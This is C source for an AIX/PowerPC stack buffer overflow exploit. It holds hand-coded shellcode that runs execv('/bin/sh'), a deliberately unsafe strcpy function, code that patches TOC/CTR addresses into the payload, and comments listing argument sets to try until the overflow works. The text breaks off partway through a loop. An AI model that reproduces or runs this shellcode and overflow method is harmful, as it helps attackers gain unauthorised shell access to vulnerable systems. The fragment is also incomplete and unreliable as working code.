/* If the program gives you 'Segmentation fault' or 'Illegal instruction', then try at least the following arguments:(string length,offset,kludge1,kludge2) 78 40 1 1 78 40 1 0 78 40 0 0 78 40 0 1 Compile with: cc -g test.c try: ./a.out 78 40 1 1 ./a.out 78 40 0 0 ./a.out 78 40 0 1 ./a.out 78 40 0 0 */ #include #include void sh2() { int junk[0x100]; int s[2]; int toc; int ctr; junk[0x100]=0x11; toc=0xf0192c48; ctr=0xd0024c0c; s[0]=0x2f62696e; s[1]=0x2f736800; execv(&s,0); } void buggy(char *s) { char a[4]; unsigned int junk[150]; strcpy(a,s); puts("Over"); if(junk[20]) puts("P"); } main(int argc,char **argv) { unsigned int junk[300]; unsigned int code[]={ 0x7c0802a6 , 0x9421fbb0 , 0x90010458 , 0x3c60f019 , 0x30632c48 , 0x90610440 , 0x3c60d002 , 0x30634c0c , 0x90610444 , 0x3c602f62 , 0x3063696e , 0x90610438 , 0x3c602f73 , 0x30636801 , 0x3863ffff , 0x9061043c , 0x30610438 , 0x7c842278 , 0x80410440 , 0x80010444 , 0x7c0903a6 , 0x4e800420, 0x0 }; unsigned int buf[600]; unsigned int i,nop,mn; int max; unsigned int toc; unsigned int eco; unsigned int *pt; int carry1=1; int carry2=1; pt=(unsigned *) &execv; toc=*(pt+1); eco=*pt; if (argv[3]) carry1=atoi(argv[3]); if (argv[4]) carry2=atoi(argv[4]); max=atoi(argv[1]); if(max==0) max=78; mn=40; if(argv[2]) mn=atoi(argv[2]); *((unsigned short *)code +9)=(unsigned short) (toc & 0x0000ffff); *((unsigned short *)code +7)=carry1+(unsigned short) ((toc >> 16) & 0x0000ffff); *((unsigned short *)code +15)=(unsigned short) (eco & 0x0000ffff); *((unsigned short *)code +13)=carry2+(unsigned short) ((eco >> 16) & 0x0000ffff); puts("Test AIX!"); puts("Discovered and coded by G.G."); printf("TOC:%0x,CTR:%0x\n",toc,eco); junk[50]=1; for(nop=0;nop